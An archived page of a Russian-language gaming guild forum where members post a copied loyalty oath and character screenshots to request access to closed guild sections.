Понедельник, 29.04.2024, 06:39
Логин:
Пароль:
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 17
  • 1
  • 2
  • 3
  • 16
  • 17
  • »
Архив - только для чтения
Форум Гильдии Excellent » Архивы » Архив Заявок » Получение доступа для второго созыва (12.03.13)
Получение доступа для второго созыва
RozenДата: Среда, 13.03.2013, 00:41 | Сообщение # 1
Guild Master
Group: Guild Administration

Flood Level: 6071

Registration was: 01.04.2010
Status: Offline
Доступ к закрытым разделам Excellent


Для получения доступа, вам предлагается заполнить форму ниже:


Я, Игровой ник, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent.

Каждый участник гильдии обязан заполнить форму выше, тем самым расписавшись под уставом и всеми вытекающими из этого обязанностями.
Без заполнения данной формы, получение доступа невозможно.
!!!ВНИМАНИЕ!!! Раздел для получения доступа в первый состав.

Возобновлено получение доступа. Добавлено новое требование - скрин персонажа с открытым календарем.
На скрине должен быть виден ваш ник с гильдией.
Скрины желательно заливать прямо на сайт. Кнопка "Обзор" в форме сообщения.


Герои на небесах и прислужники в жизни.
Чем больше ты делаешь, тем больше ты ценишься как человек.

skype: rozen_cross
vk.com/holylord
 
alin4aДата: Среда, 13.03.2013, 01:03 | Сообщение # 2
Экселлент-пользователь
Group: Пользователи

Flood Level: 116

Registration was: 11.03.2013
Status: Offline
Я, alin4a, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent.
Прикрепления: 7003604.gif (403.5 Kb)




Сообщение отредактировал alin4a - Среда, 13.03.2013, 01:35
 
СИНЧЕГГДата: Среда, 13.03.2013, 01:09 | Сообщение # 3
n00b
Group: Пользователи

Flood Level: 1

Registration was: 11.03.2013
Status: Offline
Я, СИНЧЕГГ, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent.
Скрин


Сообщение отредактировал СИНЧЕГГ - Среда, 13.03.2013, 13:08
 
XlopushkaДата: Среда, 13.03.2013, 01:09 | Сообщение # 4
Экселлент-пользователь
Group: Future Excellent

Flood Level: 173

Registration was: 14.05.2011
Status: Offline
Я, Xlopushka, вступаю в гильдию Excellent, присягаю на верность своему решению до
последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к
нему, выполнять требования воинских нормативов, приказы офицеров,
возложенные на меня правовым образом обязанности. Клянусь, находясь в
гильдии, быть честным, добросовестным, достойно переносить связанные с
ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев
и политические интересы гильдии Excellent. Клянусь не применять оружие
против своих собратьев по гильдии. Обязуюсь посещать все Территориальные
Воины, все клановые Эвенты в какое время они не были бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent
Прикрепления: 3054536.gif (417.0 Kb)


</a><script type="text/javascript" src="http://flines.ru/timelinejs/1058658.js"></script>




En la gloria Excellent!


Сообщение отредактировал Xlopushka - Среда, 13.03.2013, 01:40
 
СапфираДата: Среда, 13.03.2013, 01:12 | Сообщение # 5
n00b
Group: Пользователи

Flood Level: 2

Registration was: 11.03.2013
Status: Offline
Я, 'Сапфира', вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent.


http://cs419021.vk.me/v419021590/4ba2/wx1nrk9ttaU.jpg
 
ХакУДата: Среда, 13.03.2013, 01:12 | Сообщение # 6
n00b
Group: Пользователи

Flood Level: 42

Registration was: 13.03.2013
Status: Offline
Я, ХакУ, вступаю в гильдию Excellent, присягаю на верность своему решению до
последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к
нему, выполнять требования воинских нормативов, приказы офицеров,
возложенные на меня правовым образом обязанности. Клянусь, находясь в
гильдии, быть честным, добросовестным, достойно переносить связанные с
ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев
и политические интересы гильдии Excellent. Клянусь не применять оружие
против своих собратьев по гильдии. Обязуюсь посещать все Территориальные
Воины, все клановые Эвенты в какое время они не были бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent.

http://i064.radikal.ru/1303/20/5bb88366abfd.bmp


 
FlоydДата: Среда, 13.03.2013, 01:19 | Сообщение # 7
n00b
Group: Ex-Excellent

Flood Level: 1

Registration was: 11.03.2013
Status: Offline
Я,Floyd, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent.

http://cs410719.vk.me/v410719368/6029/AZvSITk9t30.jpg

Отсутствует скрин.


Сообщение отредактировал Flоyd - Среда, 13.03.2013, 02:05
 
UnFogivenДата: Среда, 13.03.2013, 01:22 | Сообщение # 8
n00b
Group: Пользователи

Flood Level: 1

Registration was: 13.03.2013
Status: Offline
Я, UnFogiven, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы. 
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent. 

http://i.pixs.ru/storage/5/6/5/fuckjpg_3134386_7375565.jpg
 
VegAДата: Среда, 13.03.2013, 01:25 | Сообщение # 9
n00b
Group: Пользователи

Flood Level: 2

Registration was: 13.03.2013
Status: Offline
Я, _Vega_ , вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы. 
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent. 

http://s020.radikal.ru/i711/1303/eb/fa86ea6fee84.jpg


Yo
 
lisДата: Среда, 13.03.2013, 01:29 | Сообщение # 10
Экселлент-пользователь
Group: Пользователи

Flood Level: 140

Registration was: 18.11.2010
Status: Offline
Я, liS', вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все
разъяснения к нему, выполнять требования воинских нормативов, приказы
офицеров, возложенные на меня правовым образом обязанности. Клянусь,
находясь в гильдии, быть честным, добросовестным, достойно переносить
связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать
согильдийцев и политические интересы гильдии Excellent. Клянусь не
применять оружие против своих собратьев по гильдии. Обязуюсь посещать
все Территориальные Воины, все клановые Эвенты в какое время они не были
бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent.

http://pw-helper.ru/images/misk/2013-03-13_00-57-25.jpg




 
Форум Гильдии Excellent » Архивы » Архив Заявок » Получение доступа для второго созыва (12.03.13)
  • Страница 1 из 17
  • 1
  • 2
  • 3
  • 16
  • 17
  • »
Поиск: